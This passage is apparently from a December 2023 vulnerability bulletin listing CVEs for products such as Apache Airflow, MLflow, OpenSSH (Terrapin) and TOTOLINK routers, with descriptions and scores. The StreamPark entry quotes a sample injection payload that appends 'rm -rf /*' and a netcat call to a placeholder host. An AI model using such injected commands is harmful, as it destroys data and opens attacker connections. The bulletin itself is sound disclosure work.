keycloak — keycloak | Keycloak’s device authorization grant does not correctly validate the device code and client ID. An attacker client could abuse the missing validation to spoof a client consent request and trick an authorization admin into granting consent to a malicious OAuth client or possible unauthorized access to an existing OAuth client. | 2023-12-21 | 3.5 | CVE-2023-2585
libssh — libssh | A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection. | 2023-12-19 | 3.7 | CVE-2023-6918
nautobot — nautobot | Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. When submitting a Job to run via a Job Button, only the model-level `extras.run_job` permission is checked (i.e., does the user have permission to run Jobs in general). Object-level permissions (i.e., does the user have permission to run this specific Job?) are not enforced by the URL/view used in this case. A user with permissions to run even a single Job can actually run all configured JobButton Jobs. Fix will be available in Nautobot 1.6.8 and 2.1.0 | 2023-12-22 | 3.5 | CVE-2023-51649
nextcloud — security-advisories | Nextcloud/Cloud is a calendar app for Nextcloud. An attacker can gain access to stacktrace and internal paths of the server when generating an exception while editing a calendar appointment. It is recommended that the Nextcloud Calendar app is upgraded to 4.5.3 | 2023-12-22 | 3.5 | CVE-2023-48308
phpgurukul — online_notes_sharing_system | A vulnerability has been found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file user/profile.php. The manipulation of the argument name/email leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248737 was assigned to this vulnerability. | 2023-12-21 | 3.5 | CVE-2023-7050
phpgurukul — online_notes_sharing_system | A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/signup.php. The manipulation leads to weak password requirements. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248740. | 2023-12-22 | 3.1 | CVE-2023-7053
slawkens — myaac | A vulnerability was found in slawkens MyAAC up to 0.8.13. It has been declared as problematic. This vulnerability affects unknown code of the file system/pages/bugtracker.php. The manipulation of the argument bug[2][‘subject’]/bug[2][‘text’]/report[‘subject’] leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.14 is able to address this issue. The name of the patch is 83a91ec540072d319dd338abff45f8d5ebf48190. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248848. | 2023-12-22 | 3.5 | CVE-2023-7076
sourcecodester — online_student_management_system | A vulnerability has been found in SourceCodester Online Student Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file edit-student-detail.php. The manipulation of the argument notmsg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248377 was assigned to this vulnerability. | 2023-12-19 | 2.4 | CVE-2023-6945
sourcecodester — school_visitor_log_e-book | A vulnerability was found in SourceCodester School Visitor Log e-Book 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file log-book.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248750 is the identifier assigned to this vulnerability. | 2023-12-22 | 3.5 | CVE-2023-7059
w3c — online-spellchecker-py | A vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability. | 2023-12-23 | 3.1 | CVE-2014-125108
wordpress — wordpress | Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Ricard Torres Thumbs Rating. This issue affects Thumbs Rating: from n/a through 5.0.0. | 2023-12-19 | 3.7 | CVE-2022-45809
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in gVectors Team Comments – wpDiscuz. This issue affects Comments – wpDiscuz: from n/a through 7.6.3. | 2023-12-20 | 2.7 | CVE-2023-46311


Severity Not Yet Assigned

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
apache — airflow | Apache Airflow, versions 2.6.0 through 2.7.3 has a stored XSS vulnerability that allows a DAG author to add an unbounded and not-sanitized javascript in the parameter description field of the DAG. This Javascript can be executed on the client side of any of the user who looks at the tasks in the browser sandbox. While this issue does not allow to exit the browser sandbox or manipulation of the server-side data – more than the DAG author already has, it allows to modify what the user looking at the DAG details sees in the browser – which opens up all kinds of possibilities of misleading other users. Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability | 2023-12-21 | not yet calculated | CVE-2023-47265
apache — airflow | Apache Airflow, in versions prior to 2.8.0, contains a security vulnerability that allows an authenticated user with limited access to some DAGs, to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus, enabling the user to clear DAGs they shouldn’t. This is a missing fix for CVE-2023-42792 in Apache Airflow 2.7.2. Users of Apache Airflow are strongly advised to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability. | 2023-12-21 | not yet calculated | CVE-2023-48291
apache — airflow | Apache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser – by the user who also had Airflow UI opened – to trigger the execution of DAGs without the user’s consent. Users are advised to upgrade to version 2.8.0 or later which is not affected | 2023-12-21 | not yet calculated | CVE-2023-49920
apache — iotdb | Deserialization of Untrusted Data vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 0.13.0 through 0.13.4. Users are recommended to upgrade to version 1.2.2, which fixes the issue. | 2023-12-21 | not yet calculated | CVE-2023-51656
apache — airflow | Apache Airflow, versions before 2.8.0, is affected by a vulnerability that allows an authenticated user without the variable edit permission, to update a variable. This flaw compromises the integrity of variable management, potentially leading to unauthorized data modification. Users are recommended to upgrade to 2.8.0, which fixes this issue | 2023-12-21 | not yet calculated | CVE-2023-50783
apple — macos | A session rendering issue was addressed with improved session tracking. This issue is fixed in macOS Sonoma 14.2.1. A user who shares their screen may unintentionally share the incorrect content. | 2023-12-19 | not yet calculated | CVE-2023-42940
array — arrayos_ag | MotionPro in Array ArrayOS AG before 9.4.0.505 on AG and vxAG allows remote command execution via crafted packets. AG and vxAG 9.3.0.259.x are unaffected. | 2023-12-22 | not yet calculated | CVE-2023-51707
assetwise_integrity_information_server — assetwise_integrity_information_server | Bentley eB System Management Console applications within Assetwise Integrity Information Server allow an unauthenticated user to view configuration options via a crafted request, leading to information disclosure. This affects eB System management Console before 23.00.02.03 and Assetwise ALIM For Transportation before 23.00.01.25. | 2023-12-22 | not yet calculated | CVE-2023-51708
bcoin-org — bcoin | An issue was discovered in bcoin-org bcoin version 2.2.0, allows remote attackers to obtain sensitive information via weak hashing algorithms in the component \vendor\faye-websocket.js. | 2023-12-21 | not yet calculated | CVE-2023-50475
blinksocks — blinksocks | An issue discovered in blinksocks version 3.3.8 allows remote attackers to obtain sensitive information via weak encryption algorithms in the component /presets/ssr-auth-chain.js. | 2023-12-21 | not yet calculated | CVE-2023-50481
buildkite — elastic_ci_for_aws | A symbolic link following vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to change ownership of arbitrary directories via the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. | 2023-12-22 | not yet calculated | CVE-2023-43116
buildkite — elastic_ci_for_aws | A time-of-check-time-of-use race condition vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to bypass a symbolic link check for the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. | 2023-12-22 | not yet calculated | CVE-2023-43741
cacti — cacti | Reflected Cross Site Scripting (XSS) vulnerability in Cacti v1.2.25 allows remote attackers to escalate privileges when uploading an xml template file via templates_import.php. | 2023-12-22 | not yet calculated | CVE-2023-50569
cams_biometrics — multiple_products | SQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component. | 2023-12-15 | not yet calculated | CVE-2023-48050
cesanta — mjs | Buffer Overflow vulnerability in Cesanta MJS version 2.22.0 allows attackers to execute arbitrary code, cause a denial of service (DoS), and obtain sensitive information; a segmentation fault can occur in getprop_builtin_foreign when the input string includes the name of a built-in API. | 2023-12-20 | not yet calculated | CVE-2023-50044
cryptopp — cryptopp | Crypto++ (aka cryptopp) through 8.9.0 has a Marvin side channel during decryption with PKCS#1 v1.5 padding. | 2023-12-18 | not yet calculated | CVE-2023-50979
cryptopp — cryptopp | gf2n.cpp in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (application crash) via DER public-key data for an F(2^m) curve, if the degree of each term in the polynomial is not strictly decreasing. | 2023-12-18 | not yet calculated | CVE-2023-50980
cryptopp — cryptopp | ModularSquareRoot in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (infinite loop) via crafted DER public-key data associated with squared odd numbers, such as the square of 268995137513890432434389773128616504853. | 2023-12-18 | not yet calculated | CVE-2023-50981
cuppacms — cuppacms | SQL Injection vulnerability in components/table_manager/html/edit_admin_table.php in CuppaCMS V1.0 allows attackers to run arbitrary SQL commands via the table parameter. | 2023-12-20 | not yet calculated | CVE-2023-47990
devolutions — remote_desktop_manager | Inadequate validation of permissions when employing remote tools and macros via the context menu within Devolutions Remote Desktop Manager versions 2023.3.31 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature. This affects only SQL data sources. | 2023-12-21 | not yet calculated | CVE-2023-7047
filerun — filerun | FileRun 20220519 allows SQL Injection via the “dir” parameter in a /?module=users&section=cpanel&page=list request. | 2023-12-22 | not yet calculated | CVE-2022-47532
free5gc — free5gc | An issue discovered in free5GC version 3.3.0 allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on the AMF component via a crafted NGAP message. | 2023-12-22 | not yet calculated | CVE-2023-49391
google — chrome | Insufficient policy enforcement in ADB in Google Chrome on ChromeOS prior to 114.0.5735.90 allowed a local attacker to bypass device policy restrictions via physical access to the device. (Chromium security severity: High) | 2023-12-20 | not yet calculated | CVE-2023-3742
google — chrome | Heap buffer overflow in WebRTC in Google Chrome prior to 120.0.6099.129 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2023-12-21 | not yet calculated | CVE-2023-7024
heimdal — thor_agent | An issue discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS allows attackers to bypass network filtering, execute arbitrary code, and obtain sensitive information via the DarkLayer Guard threat prevention module. | 2023-12-21 | not yet calculated | CVE-2023-29485
heimdal — thor_agent | An issue discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via the Next-Gen Antivirus component. | 2023-12-21 | not yet calculated | CVE-2023-29486
heimdal — thor_agent | An issue discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS allows attackers to cause a denial of service (DoS) via the Threat To Process Correlation threat prevention module. | 2023-12-21 | not yet calculated | CVE-2023-29487
huggingface — transformers | Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36. | 2023-12-19 | not yet calculated | CVE-2023-6730
huggingface — transformers | Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36. | 2023-12-20 | not yet calculated | CVE-2023-7018
ivanti — avalanche | An attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack. | 2023-12-19 | not yet calculated | CVE-2021-22962
ivanti — avalanche | An unauthenticated attacker could send a specifically crafted web request causing a Server-Side Request Forgery (SSRF) in Ivanti Avalanche Remote Control server. | 2023-12-19 | not yet calculated | CVE-2023-46262
ivanti — avalanche | An attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack. | 2023-12-19 | not yet calculated | CVE-2023-46266
libming — libming | Buffer Overflow vulnerability in libming version 0.4.8 allows attackers to execute arbitrary code and obtain sensitive information via the parser.c component. | 2023-12-20 | not yet calculated | CVE-2023-50628
linotp — linotp | Defective request context handling in Self Service in LinOTP 3.x before 3.2.5 allows remote unauthenticated attackers to escalate privileges, thereby allowing them to act as and with the permissions of another user. Attackers must generate repeated API requests to trigger a race condition with concurrent user activity in the self-service portal. | 2023-12-19 | not yet calculated | CVE-2023-49706
lockss-daemon — lockss-daemon | lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick. | 2023-12-15 | not yet calculated | CVE-2023-42183
ltb_self_service_password — ltb_self_service_password | An issue in LTB Self Service Password before v.1.5.4 allows a remote attacker to execute arbitrary code and obtain sensitive information via hijack of the SMS verification code function to an arbitrary phone. | 2023-12-21 | not yet calculated | CVE-2023-49032
mediawiki — mediawiki | An issue was discovered in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. In includes/logging/RightsLogFormatter.php, group-*-member messages can result in XSS on Special:log/rights. | 2023-12-22 | not yet calculated | CVE-2023-51704
mlflow — mlflow | With only one user interaction (downloading a malicious config), attackers can gain full command execution on the victim system. | 2023-12-19 | not yet calculated | CVE-2023-6940
mlflow — mlflow | A malicious user could use this issue to access internal HTTP(s) servers and, in the worst case (i.e., an AWS instance), it could be abused to get remote code execution on the victim machine. | 2023-12-20 | not yet calculated | CVE-2023-6974
mlflow — mlflow | A malicious user could use this issue to get command execution on the vulnerable machine and get access to data and model information. | 2023-12-20 | not yet calculated | CVE-2023-6975
mlflow — mlflow | This vulnerability is capable of writing arbitrary files into arbitrary locations on the remote filesystem in the context of the server process. | 2023-12-20 | not yet calculated | CVE-2023-6976
mlflow — mlflow | This vulnerability enables malicious users to read sensitive files on the server. | 2023-12-20 | not yet calculated | CVE-2023-6977
mp3gain — mp3gain | A stack buffer overflow vulnerability in MP3Gain v1.6.2 allows an attacker to cause a denial of service via the WriteMP3GainAPETag function at apetag.c:592. | 2023-12-22 | not yet calculated | CVE-2023-49356
multiple_vendors — multiple_products | Matrix SSL 4.x through 4.6.0 and Rambus TLS Toolkit have a length-subtraction integer overflow for Client Hello Pre-Shared Key extension parsing in the TLS 1.3 server. An attacked device calculates an SHA-2 hash over at least 65 KB (in RAM). With a large number of crafted TLS messages, the CPU becomes heavily loaded. This occurs in tls13VerifyBinder and tls13TranscriptHashUpdate. | 2023-12-22 | not yet calculated | CVE-2023-24609
nintendo — ds | DS Wireless Communication (DWC) with DWC_VERSION_3 and DWC_VERSION_11 allows remote attackers to execute arbitrary code on a game-playing client’s machine via a modified GPCM message. | 2023-12-20 | not yet calculated | CVE-2023-45887
nos_client — nos_client | An issue discovered in nos client version 0.6.6 allows remote attackers to escalate privileges via getRPCEndpoint.js. | 2023-12-21 | not yet calculated | CVE-2023-50477
openssh — openssh | The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH’s use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust. | 2023-12-18 | not yet calculated | CVE-2023-48795
pdf24_creator — pdf24_creator | An issue was discovered in PDF24 Creator 11.14.0. The configuration of the msi installer file was found to produce a visible cmd.exe window when using the repair function of msiexec.exe. This allows an unprivileged local attacker to use a chain of actions (e.g., an oplock on faxPrnInst.log) to open a SYSTEM cmd.exe. | 2023-12-19 | not yet calculated | CVE-2023-49147
phpsysinfo — phpsysinfo | Cross Site Request Forgery (CSRF) vulnerability in Phpsysinfo version 3.4.3 allows a remote attacker to obtain sensitive information via a crafted page in the XML.php file. | 2023-12-19 | not yet calculated | CVE-2023-49006
proftpd — proftpd | make_ftp_cmd in main.c in ProFTPD before 1.3.8a has a one-byte out-of-bounds read, and daemon crash, because of mishandling of quote/backslash semantics. | 2023-12-22 | not yet calculated | CVE-2023-51713
qbit-matui — qbit-matui | Cross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4 allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in the index.js file. | 2023-12-21 | not yet calculated | CVE-2023-50473
ruijie — ws6008 | Ruijie WS6008 v1.x v2.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 and WS6108 v1.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 were discovered to contain a command injection vulnerability via the function downFiles. | 2023-12-20 | not yet calculated | CVE-2023-50993
s-cms — s-cms | S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_newsauth parameter at /admin/ajax.php. | 2023-12-21 | not yet calculated | CVE-2023-51048
s-cms — s-cms | S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_bbsauth parameter at /admin/ajax.php. | 2023-12-21 | not yet calculated | CVE-2023-51049
s-cms — s-cms | S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_productauth parameter at /admin/ajax.php. | 2023-12-21 | not yet calculated | CVE-2023-51050
s-cms — s-cms | S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_textauth parameter at /admin/ajax.php. | 2023-12-21 | not yet calculated | CVE-2023-51051
s-cms — s-cms | S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_formauth parameter at /admin/ajax.php. | 2023-12-21 | not yet calculated | CVE-2023-51052
smartertools — smartermail | SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS by using image/svg+xml and an uploaded SVG document. This occurs because the application tries to allow youtube.com URLs, but actually allows youtube.com followed by an @ character and an attacker-controlled domain name. | 2023-12-21 | not yet calculated | CVE-2023-48114
smartertools — smartermail | SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored DOM XSS because an XSS protection mechanism is skipped when messageHTML and messagePlainText are set in the same request. | 2023-12-21 | not yet calculated | CVE-2023-48115
smartertools — smartermail | SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS via a crafted description of a Calendar appointment. | 2023-12-21 | not yet calculated | CVE-2023-48116
softing — edgeaggregator | Softing edgeAggregator Restore Configuration Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing edgeAggregator. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of backup zip files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this to execute code in the context of root. Was ZDI-CAN-20543. | 2023-12-19 | not yet calculated | CVE-2023-38126
stormshield_network_security — stormshield_network_security | An issue was discovered in Stormshield Network Security (SNS) 3.7.0 through 3.7.39, 3.11.0 through 3.11.27, 4.3.0 through 4.3.22, 4.6.0 through 4.6.9, and 4.7.0 through 4.7.1. It’s possible to know if a specific user account exists on the SNS firewall by using remote access commands. | 2023-12-21 | not yet calculated | CVE-2023-41166
stormshield_network_security — stormshield_network_security | An issue was discovered in Stormshield Network Security (SNS) 4.0.0 through 4.3.21, 4.4.0 through 4.6.8, and 4.7.0. Sending a crafted ICMP packet may lead to a crash of the ASQ engine. | 2023-12-21 | not yet calculated | CVE-2023-47093
streampark — streampark | In streampark, there is a project module that integrates Maven’s compilation capability. However, there is no check on the compilation parameters of Maven, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2. Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use “||” or “&&”: /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 & | 2023-12-15 | not yet calculated | CVE-2023-49898
sudo — sudo | Sudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit. | 2023-12-22 | not yet calculated | CVE-2023-42465
thirty_bees — thirty_bees | A stored cross-site scripting (XSS) vulnerability in the component admin/AdminRequestSqlController.php of thirty bees before 1.5.0 allows attackers to execute arbitrary web script or HTML via $e->getMessage() error mishandling. | 2023-12-22 | not yet calculated | CVE-2023-45957
totolink — a3700r | There is an arbitrary command execution vulnerability in the setDiagnosisCfg function of cstecgi.cgi in the TOTOLINK A3700R router, firmware version V9.1.2u.5822_B20200513. | 2023-12-22 | not yet calculated | CVE-2023-50147
totolink — ex1200l | TOTOLINK EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi setOpModeCfg interface. | 2023-12-22 | not yet calculated | CVE-2023-51033
totolink — ex1200l | TOTOLINK EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi UploadFirmwareFile interface. | 2023-12-22 | not yet calculated | CVE-2023-51034
totolink — ex1200l | TOTOLINK EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution on the cstecgi.cgi NTPSyncWithHost interface. | 2023-12-22 | not yet calculated | CVE-2023-51035
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘lanPriDns’ parameter of the setLanConfig interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51011
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘lanGateway’ parameter of the setLanConfig interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51012
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘lanNetmask’ parameter of the setLanConfig interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51013
totolink — ex1800t | TOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘lanSecDns’ parameter of the setLanConfig interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51014
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘enable’ parameter of the setDmzCfg interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51015
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the setRebootScheCfg interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51016
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘lanIp’ parameter of the setLanConfig interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51017
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘opmode’ parameter of the setWiFiApConfig interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51018
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘key5g’ parameter of the setWiFiExtenderConfig interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51019
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langType’ parameter of the setLanguageCfg interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51020
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘merge’ parameter of the setRptWizardCfg interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51021
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langFlag’ parameter of the setLanguageCfg interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51022
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘host_time’ parameter of the NTPSyncWithHost interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51023
totolink — ex1800t | TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘tz’ parameter of the setNtpCfg interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51024
totolink — ex1800t | TOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘admuser’ parameter of the setPasswordCfg interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51025
totolink — ex1800t | TOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘hour’ parameter of the setRebootScheCfg interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51026
totolink — ex1800t | TOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘apcliAuthMode’ parameter of the setWiFiExtenderConfig interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51027
totolink — ex1800t | TOTOLINK EX1800T 9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘apcliChannel’ parameter of the setWiFiExtenderConfig interface of cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51028
weintek — cmt2078x_easyweb | An authenticated command injection vulnerability in Weintek cMT2078X easyweb Web Version v2.1.3, OS v20220215 allows attackers to execute arbitrary code or access sensitive information via injecting a crafted payload into the HMI Name parameter. | 2023-12-19 | not yet calculated | CVE-2023-50466
windows — multiple_products | An issue discovered in TheGreenBow Windows Enterprise Certified VPN Client 6.52, Windows Standard VPN Client 6.87, and Windows Enterprise VPN Client 6.87 allows attackers to gain escalated privileges via crafted changes to a memory-mapped file. | 2023-12-19 | not yet calculated | CVE-2023-47267
xpand_it — write-back_manager | Xpand IT Write-back Manager v2.3.1 uses weak secret keys to sign JWT tokens. This allows attackers to easily obtain the secret key used to sign JWT tokens via a bruteforce attack. | 2023-12-20 | not yet calculated | CVE-2023-27172
